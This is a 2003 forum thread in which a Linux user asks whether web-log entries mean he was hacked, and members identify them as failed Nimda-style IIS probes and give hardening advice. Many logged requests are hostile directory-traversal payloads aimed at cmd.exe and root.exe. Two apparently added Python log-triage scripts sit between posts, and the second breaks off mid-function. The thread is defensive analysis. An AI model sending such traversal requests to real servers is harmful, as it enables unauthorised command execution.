
Thread: hacked

  1. #1
    Senior Member
    Join Date
    Dec 2002
    Posts
    144

    hacked

    203.125.121.32 - - [06/Feb/2003:20:01:48 +0800] "GET / HTTP/1.1" 403 2898 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020830"
    203.125.121.32 - - [06/Feb/2003:20:01:49 +0800] "GET /icons/apache_pb.gif HTTP/1.1" 200 2326 "http://203.125.121.32/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020830"
    203.125.121.32 - - [06/Feb/2003:20:01:50 +0800] "GET /icons/powered_by.gif HTTP/1.1" 200 581 "http://203.125.121.32/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020830"
    220.255.74.215 - - [06/Feb/2003:22:08:48 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:50 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:50 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:50 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:51 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:51 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:51 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:51 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:51 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:52 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:52 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:52 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:52 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 974 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:52 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 974 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:52 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:52 +0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:07 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:08 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:09 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:09 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:09 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:10 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:10 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:10 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:10 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:11 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:11 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:11 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:14 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 974 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:17 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 974 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:26 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:29 +0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:13 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:14 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:14 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:15 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:15 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:15 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:15 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:15 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:18 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:21 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:33 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:33 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:33 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 974 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:33 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 974 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:34 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:34 +0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.41.23 - - [13/Feb/2003:06:08:55 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.41.23 - - [13/Feb/2003:06:09:16 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"

    I found this on my Linux box, on which I ran httpd... I read some book and this is an indication that my system has been hacked? Is this kind of hacking only effective on IIS? What will this do to my system? What kind of software are they using to do this kind of hacking?
    BlAcKiE
    GearBlitz

  2. #2
    Jaded Network Admin nebulus200
    Join Date
    Jun 2002
    Posts
    1,356
    Ok, short answer, no you haven't been hacked. What you are seeing is the various incarnations of nimda trying to check your box to see if you are susceptible. Here is why you are not hacked:

    1) You are running linux. These vulnerabilities only affect M$ stuff running IIS.
    2) Judging from the log files this looks like apache, which is not vulnerable to these attacks.

    Lastly, take a look at the entry after the "GET ...." xxx yyyy "-" "-"

    xxx is the HTTP code returned by your webserver for that request
    yyyy is the number of bytes of the response

    If you go to:

    IETF specifications for HTTP

    You will see in chapter 10 a definition of what the response codes mean. Every response either returned 400 or 404. A quick glimpse through the specs and you will see

    404 == 404 Not Found
    400 == 400 Bad Request

    Neither of which indicate success...

    Now if this was a different attack and you saw HTTP return 200 (ok), then you should start to worry....


    Does that make sense?

    /nebulus

    EDIT:

    203.125.121.32 - - [06/Feb/2003:20:01:48 +0800] "GET / HTTP/1.1" 403 2898 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020830"
    203.125.121.32 - - [06/Feb/2003:20:01:49 +0800] "GET /icons/apache_pb.gif HTTP/1.1" 200 2326 "http://203.125.121.32/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020830"
    203.125.121.32 - - [06/Feb/2003:20:01:50 +0800] "GET /icons/powered_by.gif HTTP/1.1" 200 581 "http://203.125.121.32/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020830"
    These lines are interesting for two reasons...

    line 1: 403 was returned. This is forbidden.
    line 2/3 : 200 was returned. This was successful. (no biggy, just downloaded some gifs)

    Line 1: The last dash was replaced by "Mozilla/5.0 ...." . This is the type of browser that was used to access the page, if apache could figure it out. Notice how all those nimda lines end in "-" "-"...that means it couldn't detect a browser version...which means it was probably done either by a worm or someone using something like 'telnet' or 'netcat' to do the connection and then use HTTP commands to get the web page.


    EDIT 2:

    Man I love apache logs, so much information there (unlike IIS). The last thing of interest from your log files...notice how fast those connections were in your logs. Most of the connections from the ip were done several in the same second, most no more than five seconds apart. This should indicate to you that it was at a minimum automated (it would be difficult for someone to type that fast, if not impossible).



    Verdict: Meaningless attacks by nimda infested hosts to which you were not vulnerable.
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)
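The checks nebulus200 walks through above (status code, byte count, the two trailing "-" fields, and how tightly the requests are spaced) can be applied mechanically to a whole access_log. The script below is an added example and is not code from the thread or from any of its posters: it parses Apache combined-format lines, flags the root.exe / cmd.exe / encoded-".." request shapes seen in this thread as probes, and reports per client address whether any probe drew a 2xx, how many requests carried no User-Agent, and whether the timing looks automated. The sample lines are taken from the first post; the probe pattern, the five-second automation threshold and the verdict wording are my assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Lines from the thread's first post, in Apache "combined" log format:
# host ident user [time] "request" status bytes "referer" "user-agent"
SAMPLE_LOG = """\
203.125.121.32 - - [06/Feb/2003:20:01:48 +0800] "GET / HTTP/1.1" 403 2898 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020830"
203.125.121.32 - - [06/Feb/2003:20:01:49 +0800] "GET /icons/apache_pb.gif HTTP/1.1" 200 2326 "http://203.125.121.32/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020830"
220.255.74.215 - - [06/Feb/2003:22:08:48 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
220.255.74.215 - - [06/Feb/2003:22:08:50 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
220.255.74.215 - - [06/Feb/2003:22:08:51 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
220.255.74.215 - - [06/Feb/2003:22:08:52 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 974 "-" "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumed probe signature: the request shapes seen in the thread
# (root.exe, cmd.exe, and "..%" encoded directory traversal).
PROBE_RE = re.compile(r"root\.exe|cmd\.exe|\.\.%", re.IGNORECASE)

# Assumed threshold: consecutive requests from one host no more than this
# many seconds apart are treated as automated.
AUTOMATION_GAP_SECONDS = 5


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["is_probe"] = bool(PROBE_RE.search(rec["req"]))
    return rec


def analyze(log_text):
    """Per client address: probe count, whether any probe got a 2xx, how many
    requests had no User-Agent ("-"), and whether the timing looks automated."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            per_ip[rec["ip"]].append(rec)

    report = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["time"])
        probes = [r for r in recs if r["is_probe"]]
        gaps = [(b["time"] - a["time"]).total_seconds() for a, b in zip(recs, recs[1:])]
        if any(200 <= r["status"] < 300 for r in probes):
            verdict = "PROBE SUCCEEDED (2xx on an exploit path): investigate"
        elif probes:
            verdict = "probe blocked (no 2xx responses): noise"
        else:
            verdict = "normal"
        report[ip] = {
            "requests": len(recs),
            "probes": len(probes),
            "statuses": sorted({r["status"] for r in recs}),
            "no_user_agent": sum(1 for r in recs if r["ua"] == "-"),
            "automated": len(recs) >= 3 and all(g <= AUTOMATION_GAP_SECONDS for g in gaps),
            "verdict": verdict,
        }
    return report


if __name__ == "__main__":
    for ip, summary in analyze(SAMPLE_LOG).items():
        print(ip, summary)
```

Run it against a real access_log with `analyze(open("/var/log/httpd/access_log").read())`; the only line that should ever move the verdict to "investigate" is a probe-shaped request answered with a 2xx, which is exactly the "HTTP return 200" case nebulus200 says to worry about.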

  3. #3
    Senior Member
    Join Date
    Jan 2002
    Posts
    371
    This is a unicode attack and MS 4.0 and 5.0 IIS Webservers are vulnerable unless they are hardened or had the appropriate patches applied.

    If you have an IIS Webserver, they are full of security vulnerabilities and exploits. I suggest that you get a copy of the IIS Lockdown Tool from the M$ webpage.
    SoggyBottom.

    There were so many fewer questions when the stars were still just the holes to heaven - JJ
    I sure could use a vacation from this bull$hit, three ringed circus side show of freaks. - Tool.

  4. #4
    Senior Member
    Join Date
    Dec 2002
    Posts
    144
    **** I really got hacked... just now, at about 0715hrs... the symptoms were that I suddenly could not access my access_log... then I went to top on my Linux box... I saw a process called some "update" one... then my system went a bit hangy and my hdd activity was on... after a while the hdd activity stopped... so I went to cat my access_log... everything was gone... security_log was gone; mysql, apache error log and sendmail log were all gone... I nmapped my system and the open ports were as usual... so I suppose someone just came in and deleted my log files... what did the guy do to delete my logs? My root passwd was not changed... how did he get access to my system?

    What is the update process for? My system log is also gone...

    Originally posted here by nebulus200
    Ok, short answer, no you haven't been hacked. What you are seeing is the various incarnations of nimda trying to check your box to see if you are susceptible. Here is why you are not hacked:

    1) You are running linux. These vulnerabilities only affect M$ stuff running IIS.
    2) Judging from the log files this looks like apache, which is not vulnerable to these attacks.

    Lastly, take a look at the entry after the "GET ...." xxx yyyy "-" "-"

    xxx is the HTTP code returned by your webserver for that request
    yyyy is the number of bytes of the response

    If you go to:

    IETF specifications for HTTP

    You will see in chapter 10 a definition of what the response codes mean. Every response either returned 400 or 404. A quick glimpse through the specs and you will see

    404 == 404 Not Found
    400 == 400 Bad Request

    Neither of which indicate success...

    Now if this was a different attack and you saw HTTP return 200 (ok), then you should start to worry....


    Does that make sense?

    /nebulus

    EDIT:



    These lines are interesting for two reasons...

    line 1: 403 was returned. This is forbidden.
    line 2/3 : 200 was returned. This was successful. (no biggy, just downloaded some gifs) <- I think he is trying to test what web server I am running, man; my log was all deleted. The powered_by.gif is a gif that shows 'powered by redhat linux' and the apache_pb.gif is a picture of apache? **** man, got spied on. What command did he use to issue the HTTP command in telnet?

    Line 1: The last dash was replaced by "Mozilla/5.0 ...." . This is the type of browser that was used to access the page, if apache could figure it out. Notice how all those nimda lines end in "-" "-"...that means it couldn't detect a browser version...which means it was probably done either by a worm or someone using something like 'telnet' or 'netcat' to do the connection and then use HTTP commands to get the web page.


    EDIT 2:

    Man I love apache logs, so much information there (unlike IIS). The last thing of interest from your log files...notice how fast those connections were in your logs. Most of the connections from the ip were done several in the same second, most no more than five seconds apart. This should indicate to you that it was at a minimum automated (it would be difficult for someone to type that fast, if not impossible).



    Verdict: Meaningless attacks by nimda infested hosts to which you were not vulnerable.
    So you mean the attacker also runs on Linux, based on the Apache log?
    BlAcKiE
    GearBlitz

  5. #5
    Senior Member
    Join Date
    May 2002
    Posts
    450
    penguin,

    check your cron and make sure that your log files were not being rotated/compressed at this time, if so you may find the log files in the /var/log directory with the .gz extension. This could explain the hdd activity etc ...

    nebulus200 is absolutely correct, your linux box is not compromised by this attack, I see it all the time here as well - it just fills the log files with rubbish.

  6. #6
    Senior Member
    Join Date
    Dec 2002
    Posts
    144
    Originally posted here by Phat_Penguin
    penguin,

    check your cron and make sure that your log files were not being rotated/compressed at this time, if so you may find the log files in the /var/log directory with the .gz extension. This could explain the hdd activity etc ...

    nebulus200 is absolutely correct, your linux box is not compromised by this attack, I see it all the time here as well - it just fills the log files with rubbish.
    Feb 13 07:15:42 bb-203-125-80-216 anacron[854]: Job `cron.daily' terminated
    Feb 13 07:18:20 bb-203-125-80-216 anacron[854]: Job `cron.weekly' started
    Feb 13 07:18:21 bb-203-125-80-216 anacron[4511]: Updated timestamp for job `cron.weekly' to 2003-02-13
    Feb 13 07:22:08 bb-203-125-80-216 anacron[854]: Job `cron.weekly' terminated
    Feb 13 07:22:08 bb-203-125-80-216 anacron[854]: Normal exit (2 jobs run)

    This is the only thing left in my cron file...
    BlAcKiE
    GearBlitz

  7. #7
    Jaded Network Admin nebulus200
    Join Date
    Jun 2002
    Posts
    1,356
    If your access_log is gone, where did you get those entries?

    I have no idea whether your box was hacked or not, but one thing I can say for certain:
    Based on the logs you showed here, I can say with 100% certainty, that it is 100% impossible that you would have been compromised by those attacks shown in the logs you printed here. You may have another service that is vulnerable (type netstat -an) that someone got in on, maybe you have a badly misconfigured web server that allows write access to your logs, who knows, there are a lot of possibilities (not all of which mean you have been hacked).

    As far as you losing files, it could be the result of a hack, maybe your logging daemon crashed, maybe your system lost power while writing to / opening the file and the file was lost...there is more than one reason that those logs could be gone.

    If your system is fairly new (which is how I take it), back up your data only to a CDROM (don't access any network services) and build the system from scratch. Be sure to check any other computers that may have had a trust relationship with that computer for unauthorized access and if you aren't running a switched environment change all passwords.

    Make sure your patches are up to date, make sure you have turned off all unused services, and search around for some tutorials on hardening linux. You mentioned something about an update...are you running red hat's auto update thing? Maybe it hosed up...not sure.

    Good luck,

    /nebulus
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  8. #8
    Senior Member
    Join Date
    Dec 2002
    Posts
    144
    found something new...

    203.66.22.53 - - [13/Feb/2003:07:40:03 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.66.22.53 - - [13/Feb/2003:07:40:04 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-" <- what is this line doing?
    203.66.22.53 - - [13/Feb/2003:07:40:04 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.66.22.53 - - [13/Feb/2003:07:40:05 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.66.22.53 - - [13/Feb/2003:07:40:06 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.66.22.53 - - [13/Feb/2003:07:40:06 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.66.22.53 - - [13/Feb/2003:07:40:07 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.66.22.53 - - [13/Feb/2003:07:40:08 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.66.22.53 - - [13/Feb/2003:07:40:08 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.66.22.53 - - [13/Feb/2003:07:40:12 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.66.22.53 - - [13/Feb/2003:07:40:13 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.66.22.53 - - [13/Feb/2003:07:40:13 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"

    Latest log... and I nmapped the IP and it gave me this...

    Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
    No tcp,udp, or ICMP scantype specified, assuming SYN Stealth scan. Use -sP if you really don't want to portscan (and just want to see what hosts are up).
    Host (203.66.22.53) appears to be up ... good.
    Initiating SYN Stealth Scan against (203.66.22.53)
    Adding open port 135/tcp
    Adding open port 1025/tcp
    Adding open port 445/tcp
    Adding open port 1033/tcp
    Adding open port 3372/tcp
    Adding open port 1478/tcp
    Adding open port 1026/tcp
    Adding open port 139/tcp
    Adding open port 3049/tcp
    adjust_timeout: packet supposedly had rtt of 9028073 microseconds. Ignoring time.
    The SYN Stealth Scan took 298 seconds to scan 1601 ports.
    Interesting ports on (203.66.22.53):
    (The 1591 ports scanned but not shown below are in state: closed)
    Port State Service
    80/tcp filtered http
    135/tcp open loc-srv
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    1033/tcp open netinfo
    1478/tcp open ms-sna-base
    3049/tcp open cfs
    3372/tcp open msdtc

    Nmap run completed -- 1 IP address (1 host up) scanned in 299 seconds

    What are all these ports open for?

    Originally posted here by nebulus200
    If your access_log is gone, where did you get those entries?
    I installed the system on 6 Feb 03 and before I left there were so few entries; I have been looking at the log using the System Log application... when my hdd was having some activity just now... I started to see nothing in the log file

    I have no idea whether your box was hacked or not, but one thing I can say for certain:
    Based on the logs you showed here, I can say with 100% certainty, that it is 100% impossible that you would have been compromised by those attacks shown in the logs you printed here. You may have another service that is vulnerable (type netstat -an) that someone got in on, maybe you have a badly misconfigured web server that allows write access to your logs, who knows, there are a lot of possibilities (not all of which mean you have been hacked).

    As far as you losing files, it could be the result of a hack, maybe your logging daemon crashed, maybe your system lost power while writing to / opening the file and the file was lost...there is more than one reason that those logs could be gone.

    If your system is fairly new (which is how I take it), back up your data only to a CDROM (don't access any network services) and build the system from scratch. Be sure to check any other computers that may have had a trust relationship with that computer for unauthorized access and if you aren't running a switched environment change all passwords.

    Make sure your patches are up to date, make sure you have turned off all unused services, and search around for some tutorials on hardening linux. You mentioned something about an update...are you running red hat's auto update thing? Maybe it hosed up...not sure.

    Good luck,

    /nebulus
    I am not sure what Red Hat auto update is... I just set up Linux on an ADSL ethernet modem... so basically I am directly on the net... no firewall or anything...

    No exact OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi).
    TCP/IP fingerprint:
    SInfo(V=3.00%P=i686-pc-linux-gnu%D=2/13%Time=3E4AE295%O=135%C=1)
    TSeq(Class=RI%gcd=1%SI=A3709%TS=0)
    TSeq(Class=RI%gcd=1%SI=85CFE%IPID=RD%TS=0)
    TSeq(Class=RI%gcd=2%SI=3EB2E%TS=0)
    T1(Resp=Y%DF=Y%W=402E%ACK=S++%Flags=AS%Ops=MNWNNT)
    T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
    T3(Resp=N)
    T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
    T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
    T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
    T7(Resp=N)
    PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)

    What do you think the OS running on 203.66.22.53 is?
    BlAcKiE
    GearBlitz

  9. #9
    Senior Member
    Join Date
    May 2002
    Posts
    450
    Refer back to nebulus200's first reply .... that line returned a 404 message (File not found) so basically it's knocking on the door but can't come in - nothing to worry about.

    I see the hdd activity corresponded with cron job time stamps. That would explain the activity.

    If you are new to linux check out Bastille at http://www.bastille-linux.org, it is a hardening/firewall script which has been written for Redhat and others and will help you lock down your machine fairly securely until you get the hang of things. It has a user friendly GUI and has a step by step configuration with explanations as to what it is doing - so the set up is fairly straight forward.

    As you are on an adsl connection you really do need to lock the machine down as you will be a prime target for crackers.
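Phat_Penguin's suggestion (check whether cron rotated or compressed the logs at that moment, and look for .gz copies in /var/log) and the anacron lines BlAcKiE posted from his cron log can be turned into a repeatable check. The script below is an added example, not code from the thread or from any of its posters: `cron_events_near` parses syslog-style cron/anacron lines and returns the ones within a window of a given time, and `rotated_copies` lists rotated or compressed copies of the usual Red Hat log names. The syslog excerpt is the one quoted in the thread; the ten-minute window, the list of log names, and the `make_demo_log_dir` helper (which builds a temporary directory with constructed file names so the example runs offline) are my assumptions.

```python
import os
import re
import tempfile
from datetime import datetime, timedelta

# The anacron lines quoted in the thread. Syslog carries no year, so one is
# supplied when parsing.
SYSLOG_EXCERPT = """\
Feb 13 07:15:42 bb-203-125-80-216 anacron[854]: Job `cron.daily' terminated
Feb 13 07:18:20 bb-203-125-80-216 anacron[854]: Job `cron.weekly' started
Feb 13 07:18:21 bb-203-125-80-216 anacron[4511]: Updated timestamp for job `cron.weekly' to 2003-02-13
Feb 13 07:22:08 bb-203-125-80-216 anacron[854]: Job `cron.weekly' terminated
Feb 13 07:22:08 bb-203-125-80-216 anacron[854]: Normal exit (2 jobs run)
"""

# "Mon DD HH:MM:SS host program[pid]: message"
SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[\w.-]+)\[\d+\]: (?P<msg>.*)$"
)
CRON_PROGRAMS = ("cron", "crond", "CROND", "anacron")


def _parse_syslog_time(text, year):
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")


def cron_events_near(syslog_text, event_time, window_minutes=10, year=2003):
    """Return (timestamp, program, message) for cron/anacron lines within
    +/- window_minutes of event_time (a syslog-style "Feb 13 07:15:00" string)."""
    centre = _parse_syslog_time(event_time, year)
    window = timedelta(minutes=window_minutes)
    hits = []
    for line in syslog_text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m or m["prog"] not in CRON_PROGRAMS:
            continue
        ts = _parse_syslog_time(m["ts"], year)
        if abs(ts - centre) <= window:
            hits.append((ts, m["prog"], m["msg"]))
    return hits


def rotated_copies(log_dir, names=("access_log", "error_log", "messages", "secure", "maillog")):
    """Map each log name to the rotated/compressed copies found beside it
    (name.1, name.1.gz, name-YYYYMMDD.gz and similar)."""
    found = {}
    for entry in sorted(os.listdir(log_dir)):
        for name in names:
            if entry != name and entry.startswith(name):
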